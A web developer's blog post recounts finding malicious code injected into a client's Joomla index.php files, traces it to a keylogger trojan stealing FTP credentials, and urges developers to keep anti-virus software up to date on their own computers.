Today I got one of those client emails we all dread. The client had visited his brand new site and it wouldn't load it just gave a blank screen.
Experienced web developers know that a blank screen is really an error message so I dug a little further and checked his site with my ftp client. Not surprisingly I saw that some malicious code had been inserted into the index.php files. Fortunately there was a bug in this code and that gave the blank screen.
How did the code get there?
The usual answers are
- the joomla install is poorly configured and the file permissions are wrong eg 777
- the site has some known insecure extension
- the joomla install is outdated
- insecure passwords
But in this case the site was a clean install of the latest release of joomla with no extensions and secure file permissions. Even the passwords were all complex non-dictionary words, no p4ssw0rd or q1w2e3r4 here.
So now I am thinking it's a server hack after all it was a shared hosting solution, perhaps another site on the server had been exploited giving a hacker root access to all the shared hosts.
But that wasn't the case
By doing a little research online I discovered a report of 40,000 sites being hacked on the same day with the same, or similar, code injected into the sites. None of those sites were joomla powered, they were hosted on multiple servers and many of them had secure passwords.
What the reporter did though was to investigate exactly what the injected code was trying to do to see if there were any clues there
So what did the code do?
This tiny snippet of code would include a trojan from another site that would be downloaded to your site visitors computer. Once downloaded this trojan would record keystrokes and then upload them to a naughty person. And what was in the keystrokes? The secure ftp usernames and passwords.
With those usernames and passwords the naughty person was then able to ftp in to new sites and add their code and thus repeat the cycle of end user computer infection.
Who knows what other keystrokes they captured and were planning to use.
Interestingly during my investigations I came across a php forum where the user said.
"Help my web site stopped working. I've looked at the code and I found the following code..."
This was the exact same code snippet as on my clients web site and what was the reply on the forum. Not what you would expect.
"the syntax in your php is wrong, the correct way to insert that file is..."
So now the user is happy, his web site is back up and running... of course it is happily infected all his site visitors as well but he didn't seem to be bothered about that.
I also saw a "security expert" recommending blocking a certain IP address associated with this attack with an htaccess rule. This is foolish advice as obviously a hacker can easily use a proxy server to change their ip address. In this case it would also not have worked even if the hacker was using the blocked IP address as an htaccess rule would only prevent web access, the hacker was using ftp. (If you really want to block IP addresses then you need to do it at a server level with a firewall.
The morals of the story
There is no point in following all the best joomla security advice you can find if you don't take the simple step of securing your own personal computer with up to date anti-virus software.